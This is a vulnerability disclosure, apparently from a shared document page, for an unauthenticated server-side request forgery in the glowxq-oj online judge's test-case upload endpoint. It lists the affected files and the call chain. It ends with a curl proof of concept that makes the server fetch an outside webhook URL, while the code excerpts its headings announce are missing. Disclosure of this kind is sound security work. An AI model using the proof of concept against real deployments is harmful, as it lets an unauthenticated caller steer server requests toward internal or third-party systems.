NeverStopExploiting用户9473
Unauthenticated SSRF via ProblemCaseController in glowxq-oj
输入“/”快速插入内容
Unauthenticated SSRF via ProblemCaseController in glowxq-oj
Unauthenticated SSRF via ProblemCaseController in glowxq-oj
用户9473用户94733月3日修改
BUG_Author: Chengxin Xu
Affected Version: glowxq-oj (glowxq-oj-main)
Vulnerability Files:
•
business/business-oj/src/main/java/com/glowxq/oj/problem/controller/ProblemCaseController.java
•
common/common-core/src/main/java/com/glowxq/core/util/FileUtils.java
•
common/common-core/src/main/java/com/glowxq/core/util/http/HttpUtils.java
Description
glowxq-oj contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the test case upload functionality. The ProblemCaseController class has an endpoint annotated with @SaIgnore that accepts a user-controlled URL parameter and passes it directly to HttpUtils.download() via FileUtils.downloadFile().
Unauthenticated SSRF via /problem-case/case/uploadTestcaseZipUrl
The vulnerability chain starts from the ProblemCaseController. The endpoint has authentication disabled via @SaIgnore.
Entry Point (ProblemCaseController.java:61-69):
The URL is passed to FileUtils.downloadFile() which delegates to HttpUtils.download():
No URL Validation (FileUtils.java:157-167):
Raw HTTP request with no restrictions (HttpUtils.java:120-133):
Proof of Concept
Prerequisites
•
No authentication required
Verifying
代码块
curl -X POST "http://localhost:7101/api/problem-case/case/uploadTestcaseZipUrl" -d "url=https://webhook.site/434edfaf-c41f-4644-a69f-d08edad78a1e"